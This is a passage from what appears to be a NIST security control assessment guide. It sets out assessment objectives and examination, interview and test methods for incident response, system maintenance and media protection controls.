| (ii) the organization defines in the security plan, explicitly or by reference, the frequency of incident response tests/exercises and the frequency is at least annually; | |
| (iii) the organization tests/exercises the incident response capability for the information system using organization-defined tests/exercises in accordance with organization- defined frequency; | |
| (iv) the organization documents the results of incident response tests/exercises; and | |
| (v) the organization determines the effectiveness of the incident response capability. | |
| POTENTIAL ASSESSMENT METHODS AND OBJECTS: | |
| Examine: [SELECT FROM: Incident response policy; procedures addressing incident response testing and exercises; security plan; incident response testing material; incident response test results; other relevant documents or records]. (M) (H) | |
| IR-3(1) | INCIDENT RESPONSE TESTING AND EXERCISES |
| Control Enhancement: | |
| The organization employs automated mechanisms to more thoroughly and effectively test/exercise the incident response capability. | |
| Enhancement Supplemental Guidance: Automated mechanisms can provide the ability to more thoroughly and effectively test or exercise the capability by providing more complete coverage of incident response issues, selecting more realistic test/exercise scenarios and environments, and more effectively stressing the response capability. | |
| IR-3(1).1 | ASSESSMENT OBJECTIVE: |
| Determine if: | |
| (i) the organization employs automated mechanisms to more thoroughly and effectively test/exercise the incident response capability for the information system; and | |
| (ii) the automated mechanisms supporting incident response testing provide more complete coverage of incident response issues, more realistic test/exercise scenarios, and a greater stress on the incident response capability. | |
| POTENTIAL ASSESSMENT METHODS AND OBJECTS: | |
| Examine: [SELECT FROM: Incident response policy; procedures addressing incident response testing and exercises; security plan; incident response testing documentation; automated mechanisms supporting incident response tests/exercises; other relevant documents or records]. (H) | |
| Interview: [SELECT FROM: Organizational personnel with incident response testing responsibilities]. (H) |
| ASSESSMENT PROCEDURE | |
| IR-4 | INCIDENT HANDLING |
| Control: The organization implements an incident handling capability for security incidents that includes preparation, detection and analysis, containment, eradication, and recovery. | |
| Supplemental Guidance: Incident-related information can be obtained from a variety of sources including, but not limited to, audit monitoring, network monitoring, physical access monitoring, and user/administrator reports. The organization incorporates the lessons learned from ongoing incident handling activities into the incident response procedures and implements the procedures accordingly. Related security controls: AU-6, PE-6. | |
| IR-4.1 | ASSESSMENT OBJECTIVE: |
| Determine if: | |
| (i) the organization implements an incident handling capability for security incidents that includes preparation, detection and analysis, containment, eradication, and recovery; and | |
| (ii) the organization incorporates the lessons learned from ongoing incident handling activities into the incident response procedures and implements the procedures accordingly. | |
| POTENTIAL ASSESSMENT METHODS AND OBJECTS: | |
| Examine: [SELECT FROM: Incident response policy; procedures addressing incident handling; NIST Special Publication 800-61; other relevant documents or records]. (L) (M) (H) | |
| Interview: [SELECT FROM: Organizational personnel with incident handling responsibilities]. (H) | |
| Test: [SELECT FROM: Incident handling capability for the organization]. (H) | |
| IR-4(1) | INCIDENT HANDLING |
| Control Enhancement: | |
| The organization employs automated mechanisms to support the incident handling process. | |
| IR-4(1).1 | ASSESSMENT OBJECTIVE: |
| Determine if the organization employs automated mechanisms to support the incident handling process. | |
| POTENTIAL ASSESSMENT METHODS AND OBJECTS: | |
| Examine: [SELECT FROM: Incident response policy; procedures addressing incident handling; automated mechanisms supporting incident handling; other relevant documents or records]. (M) (H) | |
| Interview: [SELECT FROM: Organizational personnel with incident handling responsibilities]. (H) |
| ASSESSMENT PROCEDURE | |
| IR-5 | INCIDENT MONITORING |
| Control: The organization tracks and documents information system security incidents on an ongoing basis. | |
| Supplemental Guidance: None. | |
| IR-5.1 | ASSESSMENT OBJECTIVE: |
| Determine if the organization tracks and documents information system security incidents on an ongoing basis. | |
| POTENTIAL ASSESSMENT METHODS AND OBJECTS: | |
| Examine: [SELECT FROM: Incident response policy; procedures addressing incident monitoring; incident response records and documentation; other relevant documents or records]. (M) (H) | |
| Interview: [SELECT FROM: Organizational personnel with incident monitoring responsibilities]. (H) | |
| Test: [SELECT FROM: Incident monitoring capability for the organization]. (H) | |
| IR-5(1) | INCIDENT MONITORING |
| Control Enhancement: | |
| The organization employs automated mechanisms to assist in the tracking of security incidents and in the collection and analysis of incident information. | |
| IR-5(1).1 | ASSESSMENT OBJECTIVE: |
| Determine if the organization employs automated mechanisms to assist in the tracking of security incidents and in the collection and analysis of incident information. | |
| POTENTIAL ASSESSMENT METHODS AND OBJECTS: | |
| Examine: [SELECT FROM: Incident response policy; procedures addressing incident monitoring; information system design documentation; information system configuration settings and associated documentation; automated mechanisms supporting incident monitoring; other relevant documents or records]. (H) | |
| Interview: [SELECT FROM: Organizational personnel with incident monitoring responsibilities]. | |
| Test: [SELECT FROM: Automated mechanisms assisting in tracking of security incidents and in the collection and analysis of incident information]. (H) |
| ASSESSMENT PROCEDURE | |
| IR-6 | INCIDENT REPORTING |
| Control: The organization promptly reports incident information to appropriate authorities. | |
| Supplemental Guidance: The types of incident information reported, the content and timeliness of the reports, and the list of designated reporting authorities or organizations are consistent with applicable laws, Executive Orders, directives, policies, regulations, standards, and guidance. Organizational officials report cyber security incidents to the United States Computer Emergency Readiness Team (US-CERT) at http://www.us- cert.gov within the specified timeframe designated in the US-CERT Concept of Operations for Federal Cyber Security Incident Handling. In addition to incident information, weaknesses and vulnerabilities in the information system are reported to appropriate organizational officials in a timely manner to prevent security incidents. NIST Special Publication 800-61 provides guidance on incident reporting. | |
| IR-6.1 | ASSESSMENT OBJECTIVE: |
| Determine if: | |
| (i) the organization promptly reports incident information to appropriate authorities; | |
| (ii) incident reporting is consistent with NIST Special Publication 800-61; | |
| (iii) the types of incident information reported, the content and timeliness of the reports, and the list of designated reporting authorities or organizations is consistent with applicable laws, Executive Orders, directives, policies, regulations, standards, and guidance; and | |
| (iv) weaknesses and vulnerabilities in the information system are reported to appropriate organizational officials in a timely manner to prevent security incidents. | |
| POTENTIAL ASSESSMENT METHODS AND OBJECTS: | |
| Examine: [SELECT FROM: Incident response policy; procedures addressing incident reporting; NIST Special Publication 800-61; incident reporting records and documentation; other relevant documents or records]. (L) (M) (H) | |
| Interview: [SELECT FROM: Organizational personnel with incident reporting responsibilities]. (M) (H) | |
| IR-6(1) | INCIDENT REPORTING |
| Control Enhancement: | |
| The organization employs automated mechanisms to assist in the reporting of security incidents. | |
| IR-6(1).1 | ASSESSMENT OBJECTIVE: |
| Determine if the organization employs automated mechanisms to assist in the reporting of security incidents. | |
| POTENTIAL ASSESSMENT METHODS AND OBJECTS: | |
| Examine: [SELECT FROM: Incident response policy; procedures addressing incident reporting; automated mechanisms supporting incident reporting; other relevant documents or records]. (M) (H) | |
| Interview: [SELECT FROM: Organizational personnel with incident reporting responsibilities]. (H) |
| ASSESSMENT PROCEDURE | |
| IR-7 | INCIDENT RESPONSE ASSISTANCE |
| Control: The organization provides an incident response support resource that offers advice and assistance to users of the information system for the handling and reporting of security incidents. The support resource is an integral part of the organization's incident response capability. | |
| Supplemental Guidance: Possible implementations of incident response support resources in an organization include a help desk or an assistance group and access to forensics services, when required. | |
| IR-7.1 | ASSESSMENT OBJECTIVE: |
| Determine if: | |
| (i) the organization provides an incident response support resource that offers advice and assistance to users of the information system for the handling and reporting of security incidents; and | |
| (ii) the incident response support resource is an integral part of the organization's incident response capability. | |
| POTENTIAL ASSESSMENT METHODS AND OBJECTS: | |
| Examine: [SELECT FROM: Incident response policy; procedures addressing incident response assistance; other relevant documents or records]. (L) (M) (H) | |
| Interview: [SELECT FROM: Organizational personnel with incident response assistance and support responsibilities]. (M) (H) | |
| IR-7(1) | INCIDENT RESPONSE ASSISTANCE |
| Control Enhancement: | |
| The organization employs automated mechanisms to increase the availability of incident response-related information and support. | |
| IR-7(1).1 | ASSESSMENT OBJECTIVE: |
| Determine if the organization employs automated mechanisms to increase the availability of incident response-related information and support for incident response support. | |
| POTENTIAL ASSESSMENT METHODS AND OBJECTS: | |
| Examine: [SELECT FROM: Incident response policy; procedures addressing incident response assistance; automated mechanisms supporting incident response support and assistance; other relevant documents or records]. (M) (H) | |
| Interview: [SELECT FROM: Organizational personnel with incident response support and assistance responsibilities and organizational personnel that require incident response support and assistance]. (H) |
FAMILY:
Maintenance
| ASSESSMENT PROCEDURE | |
| MA-1 | SYSTEM MAINTENANCE POLICY AND PROCEDURES |
| Control: The organization develops, disseminates, and periodically reviews/updates: (i) a formal, documented, information system maintenance policy that addresses purpose, scope, roles, responsibilities, management commitment, coordination among organizational entities, and compliance; and (ii) formal, documented procedures to facilitate the implementation of the information system maintenance policy and associated system maintenance controls. | |
| Supplemental Guidance: The information system maintenance policy and procedures are consistent with applicable laws, Executive Orders, directives, policies, regulations, standards, and guidance. The information system maintenance policy can be included as part of the general information security policy for the organization. System maintenance procedures can be developed for the security program in general, and for a particular information system, when required. NIST Special Publication 800-12 provides guidance on security policies and procedures. | |
| MA-1.1 | ASSESSMENT OBJECTIVE: |
| Determine if: | |
| (i) the organization develops and documents information system maintenance policy and procedures; | |
| (ii) the organization disseminates information system maintenance policy and procedures to appropriate elements within the organization; | |
| (iii) responsible parties within the organization periodically review information system maintenance policy and procedures; and | |
| (iv) the organization updates information system maintenance policy and procedures when organizational review indicates updates are required. | |
| POTENTIAL ASSESSMENT METHODS AND OBJECTS: | |
| Examine: [SELECT FROM: Information system maintenance policy and procedures; other relevant documents or records]. (L) (M) (H) | |
| Interview: [SELECT FROM: Organizational personnel with information system maintenance responsibilities]. (H) | |
| MA-1.2 | ASSESSMENT OBJECTIVE: |
| Determine if: | |
| (i) the information system maintenance policy addresses purpose, scope, roles and responsibilities, management commitment, coordination among organizational entities, and compliance; | |
| (ii) the information system maintenance policy is consistent with the organization's mission and functions and with applicable laws, directives, policies, regulations, standards, and guidance; and | |
| (iii) the information system maintenance procedures address all areas identified in the system maintenance policy and address achieving policy-compliant implementations of all associated system maintenance controls. | |
| POTENTIAL ASSESSMENT METHODS AND OBJECTS: | |
| Examine: [SELECT FROM: Information system maintenance policy and procedures; other relevant documents or records]. (L) (M) (H) | |
| Interview: [SELECT FROM: Organizational personnel with information system maintenance responsibilities]. (H) |
| ASSESSMENT PROCEDURE | |
| MA-2 | CONTROLLED MAINTENANCE |
| Control: The organization schedules, performs, documents, and reviews records of routine preventative and regular maintenance (including repairs) on the components of the information system in accordance with manufacturer or vendor specifications and/or organizational requirements. | |
| Supplemental Guidance: All maintenance activities to include routine, scheduled maintenance and repairs are controlled; whether performed on site or remotely and whether the equipment is serviced on site or removed to another location. Organizational officials approve the removal of the information system or information system components from the facility when repairs are necessary. If the information system or component of the system requires off-site repair, the organization removes all information from associated media using approved procedures. After maintenance is performed on the information system, the organization checks all potentially impacted security controls to verify that the controls are still functioning properly. | |
| MA-2.1 | ASSESSMENT OBJECTIVE: |
| Determine if the organization schedules, performs, documents, and reviews records of routine preventative and regular maintenance (including repairs) on the components of the information system in accordance with manufacturer or vendor specifications and/or organizational requirements. | |
| POTENTIAL ASSESSMENT METHODS AND OBJECTS: | |
| Examine: [SELECT FROM: Information system maintenance policy; procedures addressing controlled maintenance for the information system; maintenance records; manufacturer/vendor maintenance specifications; other relevant documents or records]. (L) (M) (H) | |
| Interview: [SELECT FROM: Organizational personnel with information system maintenance responsibilities]. (M) (H) | |
| MA-2(1) | CONTROLLED MAINTENANCE |
| Control Enhancement: | |
| The organization maintains maintenance records for the information system that include: (i) the date and time of maintenance; (ii) name of the individual performing the maintenance; (iii) name of escort, if necessary; (iv) a description of the maintenance performed; and (v) a list of equipment removed or replaced (including identification numbers, if applicable). | |
| MA-2(1).1 | ASSESSMENT OBJECTIVE: |
| Determine if the organization maintains maintenance records for the information system that include: (i) the date and time of maintenance; (ii) name of the individual performing the maintenance; (iii) name of escort, if necessary; (iv) a description of the maintenance performed; and (v) a list of equipment removed or replaced (including identification numbers, if applicable). | |
| POTENTIAL ASSESSMENT METHODS AND OBJECTS: | |
| Examine: [SELECT FROM: Information system maintenance policy; procedures addressing controlled maintenance for the information system; maintenance records; other relevant documents or records]. (M) (H) | |
| MA-2(2) | CONTROLLED MAINTENANCE |
| Control Enhancement: | |
| The organization employs automated mechanisms to schedule and conduct maintenance as required, and to create up-to-date, accurate, complete, and available records of all maintenance actions, both needed and completed. | |
| MA-2(2).1 | ASSESSMENT OBJECTIVE: |
| Determine if the organization employs automated mechanisms to schedule and conduct maintenance as required, and to create accurate, complete, and available records of all maintenance actions, both needed and completed. | |
| POTENTIAL ASSESSMENT METHODS AND OBJECTS: | |
| Examine: [SELECT FROM: Information system maintenance policy; procedures addressing controlled maintenance for the information system; automated mechanisms supporting information system maintenance activities; information system configuration settings and associated documentation; maintenance records; other relevant documents or records]. (H) |
| ASSESSMENT PROCEDURE | |
| MA-3 | MAINTENANCE TOOLS |
| Control: The organization approves, controls, and monitors the use of information system maintenance tools and maintains the tools on an ongoing basis. | |
| Supplemental Guidance: The intent of this control is to address hardware and software brought into the information system specifically for diagnostic/repair actions (e.g., a hardware or software packet sniffer that is introduced for the purpose of a particular maintenance activity). Hardware and/or software components that may support information system maintenance, yet are a part of the system (e.g., the software implementing “ping,” “ls,” “ipconfig,” or the hardware and software implementing the monitoring port of an Ethernet switch) are not covered by this control. | |
| MA-3.1 | ASSESSMENT OBJECTIVE: |
| Determine if: | |
| (i) the organization approves, controls, and monitors the use of information system maintenance tools; and | |
| (ii) the organization maintains maintenance tools on an ongoing basis. | |
| POTENTIAL ASSESSMENT METHODS AND OBJECTS: | |
| Examine: [SELECT FROM: Information system maintenance policy; information system maintenance tools and associated documentation; procedures addressing information system maintenance tools; maintenance records; other relevant documents or records]. (M) (H) | |
| MA-3(1) | MAINTENANCE TOOLS |
| Control Enhancement: | |
| The organization inspects all maintenance tools carried into a facility by maintenance personnel for obvious improper modifications. | |
| Enhancement Supplemental Guidance: Maintenance tools include, for example, diagnostic and test equipment used to conduct maintenance on the information system. | |
| MA-3(1).1 | ASSESSMENT OBJECTIVE: |
| Determine if the organization inspects all maintenance tools (e.g., diagnostic and test equipment) carried into a facility by maintenance personnel for obvious improper modifications. | |
| POTENTIAL ASSESSMENT METHODS AND OBJECTS: | |
| Examine: [SELECT FROM: Information system maintenance policy; information system maintenance tools and associated documentation; procedures addressing information system maintenance tools; maintenance records; other relevant documents or records]. (H) | |
| Interview: [SELECT FROM: Organizational personnel with information system maintenance responsibilities]. (H) | |
| MA-3(2) | MAINTENANCE TOOLS |
| Control Enhancement: | |
| The organization checks all media containing diagnostic and test programs for malicious code before the media are used in the information system. | |
| MA-3(2).1 | ASSESSMENT OBJECTIVE: |
| Determine if the organization checks all media containing diagnostic test programs (e.g., software or firmware used for information system maintenance or diagnostics) for malicious code before the media are used in the information system. | |
| POTENTIAL ASSESSMENT METHODS AND OBJECTS: | |
| Examine: [SELECT FROM: Information system maintenance policy; information system maintenance tools and associated documentation; procedures addressing information system maintenance tools; information system media containing maintenance programs (including diagnostic and test programs); maintenance records; other relevant documents or records]. (H) | |
| Interview: [SELECT FROM: Organizational personnel with information system maintenance responsibilities]. (H) | |
| Test: [SELECT FROM: Media checking process for malicious code detection]. (H) | |
| MA-3(3) | MAINTENANCE TOOLS |
| Control Enhancement: | |
| The organization checks all maintenance equipment with the capability of retaining information so that no organizational information is written on the equipment or the equipment is appropriately sanitized before release; if the equipment cannot be sanitized, the equipment remains within the facility or is destroyed, unless an appropriate organization official explicitly authorizes an exception. | |
| MA-3(3).1 | ASSESSMENT OBJECTIVE: |
| Determine if the organization either (a) checks all maintenance equipment with the capability of retaining information so that no organizational information is written on the equipment or the equipment is appropriately sanitized before release; or (b) retains the maintenance equipment within the facility or destroys the equipment if the equipment cannot be sanitized, unless an appropriate organization official explicitly authorizes an exception. | |
| POTENTIAL ASSESSMENT METHODS AND OBJECTS: | |
| Examine: [SELECT FROM: Information system maintenance policy; information system maintenance tools and associated documentation; procedures addressing information system maintenance tools; information system media containing maintenance programs (including diagnostic and test programs); maintenance records; other relevant documents or records]. (H) | |
| Interview: [SELECT FROM: Organizational personnel with information system maintenance responsibilities]. (H) | |
| MA-3(4) | MAINTENANCE TOOLS |
| Control Enhancement: | |
| The organization employs automated mechanisms to restrict the use of maintenance tools to authorized personnel only. | |
| MA-3(4).1 | ASSESSMENT OBJECTIVE: |
| Determine if the organization employs automated mechanisms to restrict the use of maintenance tools to authorized personnel only. | |
| POTENTIAL ASSESSMENT METHODS AND OBJECTS: | |
| Examine: [SELECT FROM: Information system maintenance policy; information system maintenance tools and associated documentation; procedures addressing information system maintenance tools; automated mechanisms supporting information system maintenance activities; information system design documentation; information system configuration settings and associated documentation; maintenance records; other relevant documents or records]. | |
| Test: [SELECT FROM: Automated mechanisms supporting information system maintenance activities]. |
| ASSESSMENT PROCEDURE | |
| MA-4 | REMOTE MAINTENANCE |
| Control: The organization authorizes, monitors, and controls any remotely executed maintenance and diagnostic activities, if employed. | |
| Supplemental Guidance: Remote maintenance and diagnostic activities are conducted by individuals communicating through an external, non-organization-controlled network (e.g., the Internet). The use of remote maintenance and diagnostic tools is consistent with organizational policy and documented in the security plan for the information system. The organization maintains records for all remote maintenance and diagnostic activities. Other techniques and/or controls to consider for improving the security of remote maintenance include: (i) encryption and decryption of communications; (ii) strong identification and authentication techniques, such as Level 3 or 4 tokens as described in NIST Special Publication 800-63; and (iii) remote disconnect verification. When remote maintenance is completed, the organization (or information system in certain cases) terminates all sessions and remote connections invoked in the performance of that activity. If password-based authentication is used to accomplish remote maintenance, the organization changes the passwords following each remote maintenance service. NIST Special Publication 800-88 provides guidance on media sanitization. The National Security Agency provides a listing of approved media sanitization products at http://www.nsa.gov/ia/government/mdg.cfm. Related security controls: IA-2, MP-6. | |
| MA-4.1 | ASSESSMENT OBJECTIVE: |
| Determine if: | |
| (i) the organization authorizes, monitors, and controls the execution of maintenance and diagnostic activities conducted remotely by individuals communicating through an external, non-organization-controlled network (e.g., the Internet), if employed; | |
| (ii) the organization documents in the security plan, the remote maintenance and diagnostic tools to be employed; | |
| (iii) the organization maintains records for all remote maintenance and diagnostic activities; | |
| (iv) the organization (or information system in certain cases) terminates all sessions and remote connections invoked in the performance of remote maintenance and diagnostic activity when the remote maintenance or diagnostics is completed; and | |
| (v) the organization changes the passwords following each remote maintenance and diagnostic activity if password-based authentication is used to accomplish remote maintenance. | |
| POTENTIAL ASSESSMENT METHODS AND OBJECTS: | |
| Examine: [SELECT FROM: Information system maintenance policy; procedures addressing remote maintenance for the information system; information system design documentation; information system configuration settings and associated documentation; maintenance records; other relevant documents or records]. (L) (M) (H) | |
| Interview: [SELECT FROM: Organizational personnel with information system maintenance responsibilities]. (M) (H) | |
| MA-4(1) | REMOTE MAINTENANCE |
| Control Enhancement: | |
| The organization audits all remote maintenance and diagnostic sessions and appropriate organizational personnel review the maintenance records of the remote sessions. | |
| MA-4(1).1 | ASSESSMENT OBJECTIVE: |
| Determine if: | |
| (i) the organization audits all remote maintenance and diagnostic sessions; and | |
| (ii) appropriate organizational personnel (as deemed by the organization) review the maintenance records of remote sessions. | |
| POTENTIAL ASSESSMENT METHODS AND OBJECTS: | |
| Examine: [SELECT FROM: Information system maintenance policy; procedures addressing remote maintenance for the information system; maintenance records; audit records; other relevant documents or records]. (M) (H) | |
| Interview: [SELECT FROM: Organizational personnel with information system maintenance responsibilities]. (M) (H) | |
| MA-4(2) | REMOTE MAINTENANCE |
| Control Enhancement: | |
| The organization addresses the installation and use of remote maintenance and diagnostic links in the security plan for the information system. | |
| MA-4(2).1 | ASSESSMENT OBJECTIVE: |
| Determine if the organization addresses the installation and use of remote maintenance and diagnostic links in the security plan for the information system. | |
| POTENTIAL ASSESSMENT METHODS AND OBJECTS: | |
| Examine: [SELECT FROM: Information system maintenance policy; procedures addressing remote maintenance for the information system; security plan; maintenance records; audit records; other relevant documents or records]. (M) (H) | |
| MA-4(3) | REMOTE MAINTENANCE |
| Control Enhancement: | |
| The organization does not allow remote maintenance or diagnostic services to be performed by a provider that does not implement for its own information system, a level of security at least as high as that implemented on the system being serviced, unless the component being serviced is removed from the information system and sanitized (with regard to organizational information) before the service begins and also sanitized (with regard to potentially malicious software) after the service is performed and before being reconnected to the information system. | |
| MA-4(3).1 | ASSESSMENT OBJECTIVE: |
| Determine if the organization does not allow remote diagnostic or maintenance services to be performed by a provider that does not implement for its own information system, a level of security at least as high as the level of security implemented on the information system being serviced, unless the component being serviced is removed from the information system and sanitized (with regard to organizational information) before the service begins and also sanitized (with regard to potentially malicious software) after the service is performed and before being reconnected to the information system. | |
| POTENTIAL ASSESSMENT METHODS AND OBJECTS: | |
| Examine: [SELECT FROM: Information system maintenance policy; procedures addressing remote maintenance for the information system; service provider contracts and/or service level agreements; maintenance records; audit records; other relevant documents or records]. (H) | |
| Interview: [SELECT FROM: Organizational personnel with information system maintenance responsibilities; information system maintenance provider]. (H) |
| ASSESSMENT PROCEDURE | |
| MA-5 | MAINTENANCE PERSONNEL |
| Control: The organization allows only authorized personnel to perform maintenance on the information system. | |
| Supplemental Guidance: Maintenance personnel (whether performing maintenance locally or remotely) have appropriate access authorizations to the information system when maintenance activities allow access to organizational information or could result in a future compromise of confidentiality, integrity, or availability. When maintenance personnel do not have needed access authorizations, organizational personnel with appropriate access authorizations supervise maintenance personnel during the performance of maintenance activities on the information system. | |
| MA-5.1 | ASSESSMENT OBJECTIVE: |
| Determine if: | |
| (i) the organization allows only authorized personnel to perform maintenance on the information system; and | |
| (ii) the organization supervises authorized maintenance personnel who do not have needed access authorizations to the information system during the performance of maintenance activities on the system using organizational personnel with appropriate access authorizations. | |
| POTENTIAL ASSESSMENT METHODS AND OBJECTS: | |
| Examine: [SELECT FROM: Information system maintenance policy; procedures addressing maintenance personnel; service provider contracts and/or service level agreements; list of authorized personnel; maintenance records; other relevant documents or records]. (L) (M) (H) | |
| Interview: [SELECT FROM: Organizational personnel with information system maintenance responsibilities]. (M) (H) |
| ASSESSMENT PROCEDURE | |
| MA-6 | TIMELY MAINTENANCE |
| Control: The organization obtains maintenance support and spare parts for [Assignment: organization-defined list of key information system components] within [Assignment: organization-defined time period] of failure. | |
| Supplemental Guidance: None. | |
| MA-6.1 | ASSESSMENT OBJECTIVE: |
| Determine if: | |
| (i) the organization defines in the security plan, explicitly or by reference, key information system components; | |
| (ii) the organization defines in the security plan, explicitly or by reference, the time period within which support and spare parts must be obtained after a failure; and | |
| (iii) the organization obtains maintenance support and spare parts for the organization- defined list of key information system components within the organization-defined time period of failure. | |
| POTENTIAL ASSESSMENT METHODS AND OBJECTS: | |
| Examine: [SELECT FROM: Information system maintenance policy; procedures addressing timely maintenance for the information system; service provider contracts and/or service level agreements; inventory and availability of spare parts; security plan; other relevant documents or records]. (M) (H) | |
| Interview: [SELECT FROM: Organizational personnel with information system maintenance responsibilities]. (M) (H) |
FAMILY:
Media Protection
| ASSESSMENT PROCEDURE | |
| MP-1 | MEDIA PROTECTION POLICY AND PROCEDURES |
| Control: The organization develops, disseminates, and periodically reviews/updates: (i) a formal, documented, media protection policy that addresses purpose, scope, roles, responsibilities, management commitment, coordination among organizational entities, and compliance; and (ii) formal, documented procedures to facilitate the implementation of the media protection policy and associated media protection controls. | |
| Supplemental Guidance: The media protection policy and procedures are consistent with applicable laws, Executive Orders, directives, policies, regulations, standards, and guidance. The media protection policy can be included as part of the general information security policy for the organization. Media protection procedures can be developed for the security program in general, and for a particular information system, when required. NIST Special Publication 800-12 provides guidance on security policies and procedures. | |
| MP-1.1 | ASSESSMENT OBJECTIVE: |
| Determine if: | |
| (i) the organization develops and documents media protection policy and procedures; | |
| (ii) the organization disseminates media protection policy and procedures to appropriate elements within the organization; | |
| (iii) responsible parties within the organization periodically review media protection policy and procedures; and | |
| (iv) the organization updates media protection policy and procedures when organizational review indicates updates are required. | |
| POTENTIAL ASSESSMENT METHODS AND OBJECTS: | |
| Examine: [SELECT FROM: Media protection policy and procedures; other relevant documents or records]. (L) (M) (H) | |
| Interview: [SELECT FROM: Organizational personnel with information system media protection responsibilities]. (H) | |
| MP-1.2 | ASSESSMENT OBJECTIVE: |
| Determine if: | |
| (i) the media protection policy addresses purpose, scope, roles and responsibilities, management commitment, coordination among organizational entities, and compliance; | |
| (ii) the media protection policy is consistent with the organization's mission and functions and with applicable laws, directives, policies, regulations, standards, and guidance; and | |
| (iii) the media protection procedures address all areas identified in the media protection policy and address achieving policy-compliant implementations of all associated media protection controls. | |
| POTENTIAL ASSESSMENT METHODS AND OBJECTS: | |
| Examine: [SELECT FROM: Media protection policy and procedures; other relevant documents or records]. (L) (M) (H) | |
| Interview: [SELECT FROM: Organizational personnel with information system media protection responsibilities]. (H) |
| ASSESSMENT PROCEDURE | |
| MP-2 | MEDIA ACCESS |
| Control: The organization restricts access to information system media to authorized individuals. | |
| Supplemental Guidance: Information system media includes both digital media (e.g., diskettes, magnetic tapes, external/removable hard drives, flash/thumb drives, compact disks, digital video disks) and non-digital media (e.g., paper, microfilm). This control also applies to portable and mobile computing and communications devices with information storage capability (e.g., notebook computers, personal digital assistants, cellular telephones).
An organizational assessment of risk guides the selection of media and associated information contained on that media requiring restricted access. Organizations document in policy and procedures, the media requiring restricted access, individuals authorized to access the media, and the specific measures taken to restrict access. The rigor with which this control is applied is commensurate with the FIPS 199 security categorization of the information contained on the media. For example, fewer protection measures are needed for media containing information determined by the organization to be in the public domain, to be publicly releasable, or to have limited or no adverse impact on the organization or individuals if accessed by other than authorized personnel. In these situations, it is assumed that the physical access controls where the media resides provide adequate protection. | |
| MP-2.1 | ASSESSMENT OBJECTIVE: |
| Determine if the organization restricts access to information system media to authorized users. | |
| POTENTIAL ASSESSMENT METHODS AND OBJECTS: | |
| Examine: [SELECT FROM: Information system media protection policy; procedures addressing media access; access control policy and procedures; physical and environmental protection policy and procedures; media storage facilities; access control records; other relevant documents or records]. (L) (M) (H) | |
| Interview: [SELECT FROM: Organizational personnel with information system media protection responsibilities]. (M) (H) | |
| MP-2(1) | MEDIA ACCESS |
| Control Enhancement: | |
| The organization employs automated mechanisms to restrict access to media storage areas and to audit access attempts and access granted. | |
| Enhancement Supplemental Guidance: This control enhancement is primarily applicable to designated media storage areas within an organization where a significant volume of media is stored and is not intended to apply to every location where some media is stored (e.g., in individual offices). | |
| MP-2(1).1 | ASSESSMENT OBJECTIVE: |
| Determine if: | |
| (i) the organization employs automated mechanisms to restrict access to media storage areas; and | |
| (ii) the organization employs automated mechanisms to audit access attempts and access granted. | |
| POTENTIAL ASSESSMENT METHODS AND OBJECTS: | |
| Examine: [SELECT FROM: Information system media protection policy; procedures addressing media access; access control policy and procedures; physical and environmental protection policy and procedures; media storage facilities; access control devices; access control records; audit records; other relevant documents or records]. (M) (H) | |
| Test: [SELECT FROM: Automated mechanisms implementing access restrictions to media storage areas]. (H) |
| ASSESSMENT PROCEDURE | |
| MP-3 | MEDIA LABELING |
| Control: The organization: (i) affixes external labels to removable information system media and information system output indicating the distribution limitations, handling caveats and applicable security markings (if any) of the information; and (ii) exempts [Assignment: organization-defined list of media types or hardware components] from labeling so long as they remain within [Assignment: organization-defined protected environment]. | |
| Supplemental Guidance: An organizational assessment of risk guides the selection of media requiring labeling. Organizations document in policy and procedures, the media requiring labeling and the specific measures taken to afford such protection. The rigor with which this control is applied is commensurate with the FIPS 199 security categorization of the information contained on the media. For example, labeling is not required for media containing information determined by the organization to be in the public domain or to be publicly releasable. | |
| MP-3.1 | ASSESSMENT OBJECTIVE: |
| Determine if: | |
| (i) the organization defines in the security plan, explicitly or by reference, its protected environment for media labeling requirements; | |
| (ii) the organization defines in the security plan, explicitly or by reference, media types and hardware components that are exempted from external labeling requirements; and | |
| (iii) the organization affixes external labels to removable information storage media and information system output not otherwise exempted from this labeling requirement, indicating the distribution limitations, handling caveats, and applicable security markings (if any) of the information. | |
| POTENTIAL ASSESSMENT METHODS AND OBJECTS: | |
| Examine: [SELECT FROM: Information system media protection policy; procedures addressing media labeling; physical and environmental protection policy and procedures; security plan; removable storage media and information system output; other relevant documents or records]. (H) |
| ASSESSMENT PROCEDURE | |
| MP-4 | MEDIA STORAGE |
| Control: The organization physically controls and securely stores information system media within controlled areas. | |
| Supplemental Guidance: Information system media includes both digital media (e.g., diskettes, magnetic tapes, external/removable hard drives, flash/thumb drives, compact disks, digital video disks) and non-digital media (e.g., paper, microfilm). A controlled area is any area or space for which the organization has confidence that the physical and procedural protections provided are sufficient to meet the requirements established for protecting the information and/or information system. This control applies to portable and mobile computing and communications devices with information storage capability (e.g., notebook computers, personal digital assistants, cellular telephones). Telephone systems are also considered information systems and may have the capability to store information on internal media (e.g., on voicemail systems). Since telephone systems do not have, in most cases, the identification, authentication, and access control mechanisms typically employed in other information systems, organizational personnel exercise extreme caution in the types of information stored on telephone voicemail systems. | |
| An organizational assessment of risk guides the selection of media and associated information contained on that media requiring physical protection. Organizations document in policy and procedures, the media requiring physical protection and the specific measures taken to afford such protection. The rigor with which this control is applied is commensurate with the FIPS 199 security categorization of the information contained on the media. For example, fewer protection measures are needed for media containing information determined by the organization to be in the public domain, to be publicly releasable, or to have limited or no adverse impact on the organization or individuals if accessed by other than authorized personnel. In these situations, it is assumed that the physical access controls to the facility where the media resides provide adequate protection. The organization protects information system media identified by the organization until the media are destroyed or sanitized using approved equipment, techniques, and procedures. | |
| As part of a defense-in-depth protection strategy, the organization considers routinely encrypting information at rest on selected secondary storage devices. FIPS 199 security categorization guides the selection of appropriate candidates for secondary storage encryption. The organization implements effective cryptographic key management in support of secondary storage encryption and provides protections to maintain the availability of the information in the event of the loss of cryptographic keys by users. NIST Special Publications 800-56 and 800-57 provide guidance on cryptographic key establishment and cryptographic key management. Related security controls: CP-9, RA- 2. | |
| MP-4.1 | ASSESSMENT OBJECTIVE: |
| Determine if: | |
| (i) the organization selects and documents the media and associated information contained on that media requiring physical protection in accordance with an organizational assessment of risk; | |
| (ii) the organization defines the specific measures used to protect the selected media and information contained on that media; | |
| (iii) the organization physically controls and securely stores information system media within controlled areas; and | |
| (iv) the organization protects information system media commensurate with the FIPS 199 security categorization of the information contained on the media. | |
| POTENTIAL ASSESSMENT METHODS AND OBJECTS: | |
